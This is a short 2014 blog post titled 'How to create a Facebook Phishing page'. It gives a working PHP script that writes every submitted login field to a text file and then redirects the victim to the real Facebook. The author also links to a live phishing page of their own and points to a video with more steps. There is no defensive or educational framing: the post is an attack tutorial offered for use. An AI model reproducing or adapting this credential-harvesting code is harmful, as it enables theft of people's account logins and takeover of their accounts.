Sunday, 25 May 2014

How to create a Facebook Phishing page

HOW TO CREATE  A FACEBOOK PHISHING PAGE

php script (login.php)

save the script as login.php

<?php
header ('Location:http://www.facebook.com');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 


check out the video for further details
Here is mine facebook phishing page -> Click here
if you are logged into fb account then facebook will block that page.



don't forget to subscribe my youtube channel


0 comments:

Post a Comment